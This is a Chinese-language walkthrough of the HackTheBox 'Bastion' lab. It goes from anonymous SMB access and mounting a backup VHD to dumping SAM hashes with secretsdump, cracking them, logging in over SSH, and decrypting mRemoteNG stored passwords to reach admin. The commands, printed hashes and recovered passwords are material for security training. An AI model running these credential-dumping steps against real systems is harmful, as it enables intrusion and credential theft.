Bastion-htb-writeup

0x00 靶场技能介绍

章节技能:SMB匿名访问、远程备份磁盘本地挂载、软件密码信息文件枚举、加密密码破解

参考链接:https://0xdf.gitlab.io/2019/09/07/htb-bastion.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.134

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.134

PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,135,139,445 -sV -sC --min-rate 10000 10.10.10.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 21:49 CST
Nmap scan report for 10.10.10.134
Host is up (0.29s latency).

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-15T14:49:20+01:00
| smb2-time: 
|   date: 2024-03-15T13:49:21
|_  start_date: 2024-03-15T13:33:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.20 seconds

3、查看下SMB是否存在不需要密码的访问

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.134 -N 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

4、那就查看一下SMB服务里的Backups目录里的内容吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.134\\Backups -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 18:02:11 2019
  ..                                  D        0  Tue Apr 16 18:02:11 2019
  note.txt                           AR      116  Tue Apr 16 18:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 20:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 20:44:02 2019

                5638911 blocks of size 4096. 1177045 blocks available
smb: \> get note.txt 
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get SDT65CB.tmp 
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
  .                                  Dn        0  Fri Feb 22 20:44:02 2019
  ..                                 Dn        0  Fri Feb 22 20:44:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 20:45:32 2019
  Catalog                            Dn        0  Fri Feb 22 20:45:32 2019
  MediaId                            An       16  Fri Feb 22 20:44:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd Catalog\
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  BackupGlobalCatalog                An     5698  Fri Feb 22 20:44:02 2019
  GlobalCatalog                      An     7440  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> get BackupGlobalCatalog 
getting file \WindowsImageBackup\L4mpje-PC\Catalog\BackupGlobalCatalog of size 5698 as BackupGlobalCatalog (4.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> get GlobalCatalog 
getting file \WindowsImageBackup\L4mpje-PC\Catalog\GlobalCatalog of size 7440 as GlobalCatalog (3.0 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> cd ../
smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351\
cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \WindowsImageBackup\L4mpje-PC\> cd MediaId 
cd \WindowsImageBackup\L4mpje-PC\MediaId\: NT_STATUS_NOT_A_DIRECTORY
smb: \WindowsImageBackup\L4mpje-PC\> get MediaId 
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as MediaId (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\> cd SPPMetadataCache\
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  {cd113385-65ff-4ea2-8ced-5630f6feca8f}     An    57848  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd {cd113385-65ff-4ea2-8ced-5630f6feca8f} 
cd \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\{cd113385-65ff-4ea2-8ced-5630f6feca8f}\: NT_STATUS_NOT_A_DIRECTORY
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  {cd113385-65ff-4ea2-8ced-5630f6feca8f}     An    57848  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> get {cd113385-65ff-4ea2-8ced-5630f6feca8f} 
getting file \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\{cd113385-65ff-4ea2-8ced-5630f6feca8f} of size 57848 as {cd113385-65ff-4ea2-8ced-5630f6feca8f} (21.3 KiloBytes/sec) (average 7.1 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd ./../
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
  .                                  Dn        0  Fri Feb 22 20:45:32 2019
  ..                                 Dn        0  Fri Feb 22 20:45:32 2019
  {cd113385-65ff-4ea2-8ced-5630f6feca8f}     An    57848  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd ../../
smb: \WindowsImageBackup\> ls
  .                                  Dn        0  Fri Feb 22 20:44:02 2019
  ..                                 Dn        0  Fri Feb 22 20:44:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 20:45:32 2019

                5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\> cd ../
smb: \> ls
  .                                   D        0  Tue Apr 16 18:02:11 2019
  ..                                  D        0  Tue Apr 16 18:02:11 2019
  note.txt                           AR      116  Tue Apr 16 18:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 20:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 20:44:02 2019

                5638911 blocks of size 4096. 1176991 blocks available
smb: \>

5、经过一阵翻找,在 note.txt 文件里发现了一些提示内容

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat note.txt                   

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
系统管理员:请不要在本地传输整个备份文件,VPN到附属办公室的速度太慢。
L4mpje-PC

# Windows映像备份可能很大,传输速度很慢(如说明所警告)。我将把这个共享挂载到我的文件系统,而不是尝试复制它。

6、结合文本信息,我知道这里是需要磁盘挂载的技能和翻阅,本地挂载下远程的目录备份

1
2
3
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
[sudo] kali 的密码:

7、我将列出共享中的所有文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿offsec)-[~/Desktop]
└─$ find /mnt/ -type f
/mnt/note.txt
/mnt/SDT65CB.tmp
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/MediaId
/mnt/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}

8、我将挂载虚拟磁盘文件,看看能在其中找到什么。首先,我将安装 guestmount 和 apt install libguestfs-tools ,这是一个用于在Linux上挂载虚拟硬盘文件的工具。

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install guestmount

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install libguestfs-tools

9、现在,我将尝试挂载这两个VHD文件。第一个失败,我的kali直接卡si了,无法正常访问这个加载目录:

sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

10、第二个可以工作,提供对看起来像Windows文件系统根的访问:

sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

11、由于我这里挂载的问题,无法正常挂载上远程服务,所以直接略过了,这里可以知道这是挂载的一个备份镜像里,接下来就是通过下载SAM里的哈希了

12、有了对文件系统的完全访问权限,我就可以访问注册表文件。这些文件可以在系统运行时被锁定,但我不会在挂载的驱动器上遇到这个问题。在存储注册表配置单元的 config 目录中,我将使用 secretsdump.py 转储密码哈希:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:/mnt2/Windows/System32/config# secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e4487d0421e6611a364a5028467e053c:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

13、这次使用在线的破解网站进行破解

1
2
3
4
5
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

https://crackstation.net/

bureaulampje

14、使用SSH进程远程登录连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ED25519) to the list of known hosts.
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                         
(c) 2016 Microsoft Corporation. All rights reserved.                                                           

l4mpje@BASTION C:\Users\L4mpje>ls                                                                              
'ls' is not recognized as an internal or external command,                                                     
operable program or batch file.                                                                                

l4mpje@BASTION C:\Users\L4mpje>dir                                                                             
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             

 Directory of C:\Users\L4mpje                                                                                  

22-02-2019  13:50    <DIR>          .                                                                          
22-02-2019  13:50    <DIR>          ..                                                                         
22-02-2019  15:26    <DIR>          Contacts                                                                   
22-02-2019  15:27    <DIR>          Desktop                                                                    
22-02-2019  15:26    <DIR>          Documents                                                                  
22-02-2019  15:26    <DIR>          Downloads                                                                  
22-02-2019  15:26    <DIR>          Favorites                                                                  
22-02-2019  15:26    <DIR>          Links                                                                      
22-02-2019  15:26    <DIR>          Music                                                                      
22-02-2019  15:26    <DIR>          Pictures                                                                   
22-02-2019  15:26    <DIR>          Saved Games                                                                
22-02-2019  15:26    <DIR>          Searches                                                                   
22-02-2019  15:26    <DIR>          Videos                                                                     
               0 File(s)              0 bytes                                                                  
              13 Dir(s)   4.818.972.672 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                      
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje\Desktop>

15、直接获取第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                     
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\Users\L4mpje\Desktop                                                                          
                                                                                                               
22-02-2019  15:27    <DIR>          .                                                                          
22-02-2019  15:27    <DIR>          ..                                                                         
15-03-2024  14:34                34 user.txt                                                                   
               1 File(s)             34 bytes                                                                  
               2 Dir(s)   4.818.972.672 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                           
c45f73eef3fd98b1ab10266727a724d1                                                                               
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje\Desktop>

0x02 系统权限获取

16、接下来使用当前账号继续对目录文件进行信息枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
l4mpje@BASTION C:\>dir                                                                                         
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\                                                                                              
                                                                                                               
16-04-2019  11:02    <DIR>          Backups                                                                    
12-09-2016  12:35    <DIR>          Logs                                                                       
22-02-2019  14:42    <DIR>          PerfLogs                                                                   
31-01-2022  17:39    <DIR>          Program Files                                                              
22-02-2019  14:01    <DIR>          Program Files (x86)                                                        
22-02-2019  13:50    <DIR>          Users                                                                      
31-01-2022  17:52    <DIR>          Windows                                                                    
               0 File(s)              0 bytes                                                                  
               7 Dir(s)   4.818.399.232 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\>cd "Program Files"                                                                          
                                                                                                               
l4mpje@BASTION C:\Program Files>ls                                                                             
'ls' is not recognized as an internal or external command,                                                     
operable program or batch file.                                                                                
                                                                                                               
l4mpje@BASTION C:\Program Files>dir                                                                            
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\Program Files                                                                                 
                                                                                                               
31-01-2022  17:39    <DIR>          .                                                                          
31-01-2022  17:39    <DIR>          ..                                                                         
16-04-2019  11:18    <DIR>          Common Files                                                               
23-02-2019  09:38    <DIR>          Internet Explorer                                                          
22-02-2019  14:19    <DIR>          OpenSSH-Win64                                                              
22-02-2019  14:08    <DIR>          PackageManagement                                                          
31-01-2022  17:39    <DIR>          VMware                                                                     
23-02-2019  10:22    <DIR>          Windows Defender                                                           
23-02-2019  09:38    <DIR>          Windows Mail                                                               
23-02-2019  10:22    <DIR>          Windows Media Player                                                       
16-07-2016  14:23    <DIR>          Windows Multimedia Platform                                                
16-07-2016  14:23    <DIR>          Windows NT                                                                 
23-02-2019  10:22    <DIR>          Windows Photo Viewer                                                       
16-07-2016  14:23    <DIR>          Windows Portable Devices                                                   
22-02-2019  14:08    <DIR>          WindowsPowerShell                                                          
               0 File(s)              0 bytes                                                                  
              15 Dir(s)   4.818.399.232 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Program Files> 



l4mpje@BASTION C:\Program Files>cd ../                                                                         
                                                                                                               
l4mpje@BASTION C:\>cd "Program Files (x86)"                                                                    
                                                                                                               
l4mpje@BASTION C:\Program Files (x86)>dir                                                                      
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\Program Files (x86)                                                                           
                                                                                                               
22-02-2019  14:01    <DIR>          .                                                                          
22-02-2019  14:01    <DIR>          ..                                                                         
16-07-2016  14:23    <DIR>          Common Files                                                               
23-02-2019  09:38    <DIR>          Internet Explorer                                                          
16-07-2016  14:23    <DIR>          Microsoft.NET                                                              
22-02-2019  14:01    <DIR>          mRemoteNG                                                                  
23-02-2019  10:22    <DIR>          Windows Defender                                                           
23-02-2019  09:38    <DIR>          Windows Mail                                                               
23-02-2019  10:22    <DIR>          Windows Media Player                                                       
16-07-2016  14:23    <DIR>          Windows Multimedia Platform                                                
16-07-2016  14:23    <DIR>          Windows NT                                                                 
23-02-2019  10:22    <DIR>          Windows Photo Viewer                                                       
16-07-2016  14:23    <DIR>          Windows Portable Devices                                                   
16-07-2016  14:23    <DIR>          WindowsPowerShell                                                          
               0 File(s)              0 bytes                                                                  
              14 Dir(s)   4.818.399.232 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Program Files (x86)>



l4mpje@BASTION C:\Program Files (x86)>cd mRemoteNG                                                             
                                                                                                               
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>dir                                                            
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\Program Files (x86)\mRemoteNG                                                                 
                                                                                                               
22-02-2019  14:01    <DIR>          .                                                                          
22-02-2019  14:01    <DIR>          ..                                                                         
18-10-2018  22:31            36.208 ADTree.dll                                                                 
18-10-2018  22:31           346.992 AxInterop.MSTSCLib.dll                                                     
18-10-2018  22:31            83.824 AxInterop.WFICALib.dll                                                     
18-10-2018  22:31         2.243.440 BouncyCastle.Crypto.dll                                                    
18-10-2018  22:30            71.022 Changelog.txt                                                              
18-10-2018  22:30             3.224 Credits.txt                                                                
22-02-2019  14:01    <DIR>          cs-CZ                                                                      
22-02-2019  14:01    <DIR>          de                                                                         
22-02-2019  14:01    <DIR>          el                                                                         
22-02-2019  14:01    <DIR>          en-US                                                                      
22-02-2019  14:01    <DIR>          es                                                                         
22-02-2019  14:01    <DIR>          es-AR                                                                      
22-02-2019  14:01    <DIR>          Firefox                                                                    
22-02-2019  14:01    <DIR>          fr                                                                         
18-10-2018  22:31         1.966.960 Geckofx-Core.dll                                                           
05-07-2017  00:31         4.482.560 Geckofx-Core.pdb                                                           
18-10-2018  22:31           143.728 Geckofx-Winforms.dll                                                       
05-07-2017  00:31           259.584 Geckofx-Winforms.pdb                                                       
22-02-2019  14:01    <DIR>          Help                                                                       
22-02-2019  14:01    <DIR>          hu                                                                         
22-02-2019  14:01    <DIR>          Icons                                                                      
18-10-2018  22:31           607.088 Interop.MSTSCLib.dll                                                       
18-10-2018  22:31           131.440 Interop.WFICALib.dll                                                       
22-02-2019  14:01    <DIR>          it                                                                         
22-02-2019  14:01    <DIR>          ja-JP                                                                      
22-02-2019  14:01    <DIR>          ko-KR                                                                      
07-10-2018  12:21            18.326 License.txt                                                                
18-10-2018  22:31           283.504 log4net.dll                                                                
18-10-2018  22:31           412.528 MagicLibrary.dll                                                           
18-10-2018  22:31         1.552.240 mRemoteNG.exe                                                              
07-10-2018  12:21            28.317 mRemoteNG.exe.config                                                       
18-10-2018  22:30         2.405.888 mRemoteNG.pdb                                                              
22-02-2019  14:01    <DIR>          nb-NO                                                                      
22-02-2019  14:01    <DIR>          nl                                                                         
18-10-2018  22:31           451.952 ObjectListView.dll                                                         
22-02-2019  14:01    <DIR>          pl                                                                         
22-02-2019  14:01    <DIR>          pt                                                                         
22-02-2019  14:01    <DIR>          pt-BR                                                                      
07-10-2018  12:21           707.952 PuTTYNG.exe                                                                
07-10-2018  12:21               887 Readme.txt                                                                 
18-10-2018  22:31           415.088 Renci.SshNet.dll                                                           
22-02-2019  14:01    <DIR>          ru                                                                         
22-02-2019  14:01    <DIR>          Schemas                                                                    
22-02-2019  14:01    <DIR>          Themes                                                                     
22-02-2019  14:01    <DIR>          tr-TR                                                                      
22-02-2019  14:01    <DIR>          uk                                                                         
18-10-2018  22:31           152.432 VncSharp.dll                                                               
18-10-2018  22:31           312.176 WeifenLuo.WinFormsUI.Docking.dll                                           
18-10-2018  22:31            55.152 WeifenLuo.WinFormsUI.Docking.ThemeVS2003.dll                               
18-10-2018  22:31           168.816 WeifenLuo.WinFormsUI.Docking.ThemeVS2012.dll                               
18-10-2018  22:31           217.968 WeifenLuo.WinFormsUI.Docking.ThemeVS2013.dll                               
18-10-2018  22:31           243.056 WeifenLuo.WinFormsUI.Docking.ThemeVS2015.dll                               
22-02-2019  14:01    <DIR>          zh-CN                                                                      
22-02-2019  14:01    <DIR>          zh-TW                                                                      
              28 File(s)     17.802.352 bytes                                                                  
              28 Dir(s)   4.818.399.232 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG> 


l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type Changelog.txt                                             
1.76.11 (2018-10-18):                                                                                          
                                                                                                               
Fixes:                                                                                                         
------                                                                                                         
#1139: Feature "Reconnect to previously opened sessions" not working                                           
#1136: Putty window not maximized 

1.76.10 (2018-10-07):                                                                                          
                                                                                                               
Fixes:                                                                                                         
------                                                                                                         
#1124: Enabling themes causes an exceptio



C:\Users\L4mpje\AppData\Roaming\mRemoteNG


l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG                   
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                   
 Volume in drive C has no label.                                                                               
 Volume Serial Number is 1B7D-E692                                                                             
                                                                                                               
 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                        
                                                                                                               
22-02-2019  14:03    <DIR>          .                                                                          
22-02-2019  14:03    <DIR>          ..                                                                         
22-02-2019  14:03             6.316 confCons.xml                                                               
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                    
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                    
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                    
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                    
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                    
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                    
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                    
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                    
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                    
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                    
22-02-2019  14:03                51 extApps.xml                                                                
22-02-2019  14:03             5.217 mRemoteNG.log                                                              
22-02-2019  14:03             2.245 pnlLayout.xml                                                              
22-02-2019  14:01    <DIR>          Themes                                                                     
              14 File(s)         76.577 bytes                                                                  
               3 Dir(s)   4.818.399.232 bytes free                                                             
                                                                                                               
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>

17、这里在软件数据目录里发现了一些敏感信息,这里使用SCP把文件下载下来

1
scp l4mpje@10.10.10.134:\users\l4mpje\AppData\Roaming\mRemoteNG\confCons.xml confCons.xml

18、使用解密工具进行解密

1
2
3
4
5
6
7
8
9
10
11
https://github.com/kmahyyg/mremoteng-decrypt/releases

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
User Input: OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
Use default password for cracking...
Decrypted Output: bureaulampje

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
User Input: V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
Use default password for cracking...
Decrypted Output: thXLHM96BeKL0ER2

19、使用解密的密码,直接登录并获取最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
